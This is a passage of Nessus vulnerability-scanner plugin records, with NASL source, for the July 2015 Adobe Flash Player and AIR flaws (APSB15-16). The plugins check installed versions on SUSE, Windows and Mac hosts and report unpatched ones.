value:\"https://www.suse.com/security/cve/CVE-2015-3119/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3120/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3121/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3122/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3123/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3124/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3125/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3126/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3127/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3128/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3129/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3130/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3131/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3132/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3133/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3134/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3135/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3136/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-3137/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4428/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4429/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4430/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4431/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4432/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-4433/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-5116/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-5117/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-5118/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-5119/\");\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151211-1.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fcaa49e7\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2015-306=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2015-306=1\n\nTo bring your system up-to-date, use 'zypper patch'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.481-93.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.481-93.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:01:50", "description": "The version of Adobe Flash Player installed on the remote Windows host is equal or prior to version 18.0.0.194. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)", "cvss3": {"score": null, "vector": null}, "published": "2015-07-09T00:00:00", "type": "nessus", "title": "Adobe Flash Player <= 18.0.0.194 Multiple Vulnerabilities (APSB15-16)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119", "CVE-2015-5124"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB15-16.NASL", "href": "https://www.tenable.com/plugins/nessus/84642", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84642);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe Flash Player <= 18.0.0.194 Multiple Vulnerabilities (APSB15-16)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows host\nis equal or prior to version 18.0.0.194. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 18.0.0.203 or later.\n\nAlternatively, Adobe has made version 13.0.0.302 available for those\ninstallations that cannot be upgraded to 18.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if(isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if(isnull(ver))\n continue;\n\n vuln = FALSE;\n\n # Chrome Flash <= 18.0.0.194\n if(variant == \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"18.0.0.194\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # <= 13.0.0.296\n if(variant != \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"13.0.0.296\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # 14-18 <= 18.0.0.194\n if(variant != \"Chrome_Pepper\" &&\n ver =~ \"^1[4-8]\\.\" &&\n ver_compare(ver:ver,fix:\"18.0.0.194\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n if(vuln)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : NPAPI Browser plugin (for Firefox / Netscape / Opera)';\n fix = \"18.0.0.203 / 13.0.0.302\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"18.0.0.203 / 13.0.0.302\";\n }\n else if (variant == \"Chrome\")\n {\n info += '\\n Product : Browser plugin (for Google Chrome)';\n fix = \"Upgrade to the latest version of Google Chrome.\";\n }\n else if (variant == \"Chrome_Pepper\")\n {\n info += '\\n Product : PPAPI Browser plugin (for Opera and Chromium)';\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 18.0.0.203 (Chrome PepperFlash)';\n else if(!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:19:02", "description": "According to its version, the installation of Adobe AIR on the remote Mac OS X host is equal or prior to 18.0.0.144. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)", "cvss3": {"score": null, "vector": null}, "published": "2015-07-09T00:00:00", "type": "nessus", "title": "Adobe AIR for Mac <= 18.0.0.144 Multiple Vulnerabilities (APSB15-16)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0578", "CVE-2015-3097", "CVE-2015-3114", "CVE-2015-3115", "CVE-2015-3116", "CVE-2015-3117", "CVE-2015-3118", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3122", "CVE-2015-3123", "CVE-2015-3124", "CVE-2015-3125", "CVE-2015-3126", "CVE-2015-3127", "CVE-2015-3128", "CVE-2015-3129", "CVE-2015-3130", "CVE-2015-3131", "CVE-2015-3132", "CVE-2015-3133", "CVE-2015-3134", "CVE-2015-3135", "CVE-2015-3136", "CVE-2015-3137", "CVE-2015-4428", "CVE-2015-4429", "CVE-2015-4430", "CVE-2015-4431", "CVE-2015-4432", "CVE-2015-4433", "CVE-2015-5116", "CVE-2015-5117", "CVE-2015-5118", "CVE-2015-5119", "CVE-2015-5124"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "MACOSX_ADOBE_AIR_APSB15-16.NASL", "href": "https://www.tenable.com/plugins/nessus/84643", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84643);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2014-0578\",\n \"CVE-2015-3097\",\n \"CVE-2015-3114\",\n \"CVE-2015-3115\",\n \"CVE-2015-3116\",\n \"CVE-2015-3117\",\n \"CVE-2015-3118\",\n \"CVE-2015-3119\",\n \"CVE-2015-3120\",\n \"CVE-2015-3121\",\n \"CVE-2015-3122\",\n \"CVE-2015-3123\",\n \"CVE-2015-3124\",\n \"CVE-2015-3125\",\n \"CVE-2015-3126\",\n \"CVE-2015-3127\",\n \"CVE-2015-3128\",\n \"CVE-2015-3129\",\n \"CVE-2015-3130\",\n \"CVE-2015-3131\",\n \"CVE-2015-3132\",\n \"CVE-2015-3133\",\n \"CVE-2015-3134\",\n \"CVE-2015-3135\",\n \"CVE-2015-3136\",\n \"CVE-2015-3137\",\n \"CVE-2015-4428\",\n \"CVE-2015-4429\",\n \"CVE-2015-4430\",\n \"CVE-2015-4431\",\n \"CVE-2015-4432\",\n \"CVE-2015-4433\",\n \"CVE-2015-5116\",\n \"CVE-2015-5117\",\n \"CVE-2015-5118\",\n \"CVE-2015-5119\",\n \"CVE-2015-5124\"\n );\n script_bugtraq_id(\n 75090,\n 75568,\n 75590,\n 75591,\n 75592,\n 75593,\n 75594,\n 75595,\n 75596\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe AIR for Mac <= 18.0.0.144 Multiple Vulnerabilities (APSB15-16)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a version of Adobe AIR installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nMac OS X host is equal or prior to 18.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that\n allows an attacker to guess the address for the Flash\n heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities\n exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that\n allow arbitrary code execution. (CVE-2015-3117,\n CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in\n an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow\n arbitrary code execution. (CVE-2015-3119, CVE-2015-3120,\n CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow\n arbitrary code execution. (CVE-2015-3118, CVE-2015-3124,\n CVE-2015-5117, CVE-2015-3127, CVE-2015-3128,\n CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428,\n CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist\n that allow information disclosure. (CVE-2014-0578,\n CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116)\n\n - A memory corruption issue exists due to improper\n validation of user-supplied input. An attacker can\n exploit this to execute arbitrary code. (CVE-2015-5124)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 18.0.0.180 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-5124\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_air_installed.nasl\");\n script_require_keys(\"MacOSX/Adobe_AIR/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nkb_base = \"MacOSX/Adobe_AIR\";\nversion = get_kb_item_or_exit(kb_base+\"/Version\");\npath = get_kb_item_or_exit(kb_base+\"/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\ncutoff_version = '18.0.0.144';\nfixed_version_for_report = '18.0.0.180';\n\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version, path);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-05T17:19:03", "description": "The version of Adobe Flash Player installed on the remote Mac OS X host is equal or prior to version 18.0.0.194. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists that allows an attacker to guess the address for the Flash heap. (CVE-2015-3097)\n\n - Multiple heap-based buffer overflow vulnerabilities exist that allow arbitrary code execution.\n (CVE-2015-3135, CVE-2015-4432, CVE-2015-5118)\n\n - Multiple memory corruption vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133, CVE-2015-3134, CVE-2015-4431)\n\n - Multiple NULL pointer dereference flaws exist.\n (CVE-2015-3126, CVE-2015-4429)\n\n - A security bypass vulnerability exists that results in an information disclosure. (CVE-2015-3114)\n\n - Multiple type confusion vulnerabilities exist that allow arbitrary code execution. (CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122, CVE-2015-4433)\n\n - Multiple use-after-free errors exist that allow arbitrary code execution. (CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127, CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132, CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430, CVE-2015-5119)\n\n - Multiple same-origin policy bypass vulnerabilities exist that allow information disclosure. (CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125, CVE-2015-5116)\n\n - A memory corruption issue exists due to improper validation of user-supplied input. An attacker can exploit this to execute arbitrary code. (CVE-2015-5124)", "cvss3": {"score": null, "vector": null}, "published": "2015-07-09T00:00:00", "type": "nessus", "title": "Adobe Flash Player <= 18.0.0.194 Multiple 